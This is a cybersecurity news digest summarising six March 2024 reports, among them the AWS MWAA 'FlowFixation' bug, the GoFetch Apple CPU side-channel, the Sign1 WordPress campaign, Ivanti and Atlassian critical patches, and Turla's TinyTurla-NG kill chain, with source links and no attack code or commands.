AWS Patches Critical ‘FlowFixation’ Bug in Airflow Service to Prevent Session Hijacking
Cybersecurity researchers have shared details of a now-patched security vulnerability in Amazon Web Services (AWS) Managed Workflows for Apache Airflow (MWAA) that could be potentially exploited by a malicious actor to hijack victims’ sessions and achieve remote code execution on underlying instances.
The vulnerability, now addressed by AWS, has been codenamed FlowFixation by Tenable.
“Upon taking over the victim’s account, the attacker could have performed tasks such as reading connection strings, adding configurations and triggering directed acyclic graphs (DAGS),” senior security researcher Liv Matan said in a technical analysis.
“Under certain circumstances such actions can result in RCE on the instance that underlies the MWAA, and in lateral movement to other services.”
Source: The hacker news
Link: https://thehackernews.com/2024/03/aws-patches-critical-flowfixation-bug.html
New GoFetch attack on Apple Silicon CPUs can steal crypto keys
A new side-channel attack called “GoFetch” impacts Apple M1, M2, and M3 processors and can be used to steal secret cryptographic keys from data in the CPU’s cache.
The attack targets constant-time cryptographic implementations using data memory-dependent prefetchers (DMPs) found in modern Apple CPUs. This allows it to recreate the private cryptographic keys for various algorithms, including OpenSSL Diffie-Hellman, Go RSA, CRYSTALS Kyber, and Dilithium from the CPU’s cache.
GoFetch was developed by a team of seven researchers from various universities in the U.S., who reported their findings to Apple on December 5, 2023.
Source: Bleeping computer / Securityweek / Chen-Wang-Shome-Fletcher and team
Link: https://www.securityweek.com/new-gofetch-apple-cpu-attack-exposes-crypto-keys/
Link: https://gofetch.fail
Massive Sign1 Campaign Infects 39,000+ WordPress Sites with Scam Redirects
A massive malware campaign dubbed Sign1 has compromised over 39,000 WordPress sites in the last six months, using malicious JavaScript injections to redirect users to scam sites.
The most recent variant of the malware is estimated to have infected no less than 2,500 sites over the past two months alone, Sucuri said in a report published this week.
The attacks entail injecting rogue JavaScript into legitimate HTML widgets and plugins that allow for arbitrary JavaScript and other code to be inserted, providing attackers with an opportunity to add their malicious code. The XOR-encoded JavaScript code is subsequently decoded and used to execute a JavaScript file hosted on a remote server, which ultimately facilitates redirects to a VexTrio-operated traffic distribution system (TDS) but only if certain criteria are met.
Source: The hacker news / Bleeping computer / Securityweek
Link: https://thehackernews.com/2024/03/massive-sign1-campaign-infects-39000.html
Link: https://www.securityweek.com/39000-websites-infected-in-sign1-malware-campaign/
Ivanti Releases Urgent Fix for Critical Sentry RCE Vulnerability
Ivanti has disclosed details of a critical remote code execution flaw impacting Standalone Sentry, urging customers to apply the fixes immediately to stay protected against potential cyber threats. Tracked as CVE-2023-41724, the vulnerability carries a CVSS score of 9.6.
“An unauthenticated threat actor can execute arbitrary commands on the underlying operating system of the appliance within the same physical or logical network,” the company said.
The flaw impacts all supported versions 9.17.0, 9.18.0, and 9.19.0, as well as older versions. The company said it has made available a patch (versions 9.17.1, 9.18.1, and 9.19.1) that can be downloaded via the standard download portal.
It credited Vincent Hutsebaut, Pierre Vivegnis, Jerome Nokin, Roberto Suggi Liverani and Antonin B. of NATO Cyber Security Centre for “their collaboration on this issue.”
Ivanti emphasized that it’s not aware of any customers affected by CVE-2023-41724, and added that “threat actors without a valid TLS client certificate enrolled through EPMM cannot directly exploit this issue on the internet.”
Source: The hacker news / Bleeping computer / Securityweek / Ivanti forum
Link: https://thehackernews.com/2024/03/ivanti-releases-urgent-fix-for-critical.html
Atlassian Releases Fixes for Over 2 Dozen Flaws, Including Critical Bamboo Bug
Atlassian has released patches for more than two dozen security flaws, including a critical bug impacting Bamboo Data Center and Server that could be exploited without requiring user interaction.
Tracked as CVE-2024-1597, the vulnerability carries a CVSS score of 10.0, indicating maximum severity.
Described as an SQL injection flaw, it’s rooted in a dependency called org.postgresql:postgresql, as a result of which the company said it “presents a lower assessed risk” despite the criticality.
“This org.postgresql:postgresql dependency vulnerability […] could allow an unauthenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction,” Atlassian said.
Source: The hacker news / Securityweek
Link: https://thehackernews.com/2024/03/atlassian-releases-fixes-for-over-2.html
New details on TinyTurla’s post-compromise activity reveal full kill chain
Cisco Talos is providing an update on its two recent reports on a new and ongoing campaign where Turla, a Russian espionage group, deployed their TinyTurla-NG (TTNG) implant. We now have new information on the entire kill chain this actor uses, including the tactics, techniques and procedures (TTPs) utilized to steal valuable information from their victims and propagate through their infected enterprises.
Talos’ analysis, in coordination with CERT.NGO, reveals that Turla infected multiple systems in the compromised network of a European non-governmental organization (NGO). The attackers compromised the first system, established persistence and added exclusions to anti-virus products running on these endpoints as part of their preliminary post-compromise actions.
Turla then opened additional channels of communication via Chisel for data exfiltration and to pivot to additional accessible systems in the network.
Source: CISCO Talos intelligence group
Source: https://blog.talosintelligence.com/tinyturla-full-kill-chain/